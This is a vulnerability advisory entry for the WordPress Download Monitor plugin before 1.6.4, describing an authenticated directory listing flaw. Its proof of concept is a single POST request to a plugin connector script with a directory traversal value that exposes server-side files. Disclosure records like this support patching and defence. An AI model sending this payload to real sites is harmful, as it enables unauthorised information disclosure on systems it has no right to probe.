WordPress Plugin Vulnerabilities
Download Monitor < 1.6.4 - Authenticated Directory Listing
Description
Directory listing vulnerability that can lead to information disclosure. Authenticated users can list sever side files and directories.
Proof of Concept
POST /wp-content/plugins/download-monitor/assets/js/jqueryFileTree/connectors/jqueryFileTreeDir.php dir=../../../../../../../
Affects Plugins
References
Miscellaneous
Submitter
Abdallah Samman
Submitter twitter
Verified
No
WPVDB ID
Timeline
Publicly Published
2015-03-08 (about 9 years ago)
Added
2015-03-09 (about 9 years ago)
Last Updated
2021-10-06 (about 2 years ago)